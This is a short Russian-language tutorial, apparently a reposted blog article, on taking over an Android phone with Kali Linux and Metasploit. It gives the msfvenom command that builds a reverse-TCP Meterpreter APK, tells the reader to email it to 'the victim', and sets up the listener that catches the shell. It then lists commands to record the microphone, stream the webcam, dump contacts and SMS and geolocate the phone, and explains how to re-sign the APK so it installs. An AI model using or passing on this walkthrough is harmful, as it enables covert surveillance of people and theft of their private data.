Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload. Установка и использование msfvenom payload: 1. Запустите kali и откройте панель управления. 2. Установите payload и создайте всплывающее окно пользователя вот этой командой: root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk (Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig) Файл apk сохранен в базовую папку. Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо). 3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку. 4. Запустите metasploit framework следующей командой root@kali:-# msfconsole 5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции: msf > use multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.110 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit Запускается драйвер Payload…….. 6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления. 7. Воспользуйтесь следующими командами просмотра: record_mic webcam_snap webcam_stream dump_contacts dump_sms geolocate Что делать, если вылетает ошибка парсинга: Error fixing(incase you get PARSE ERROR) Для исправления этой ошибки загрузите signapk После чего выполните следующие операции: Откройте папку «Signapk» и запустите расширение «cmd». Скопируйте «andro.apk» (созданное вами приложение) в папку Signapk. Введите следующую команду java -» jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk «в cmd (без двойных кавычек) Скопируйте на телефон и установите. Молимся чтобы сработало… Источник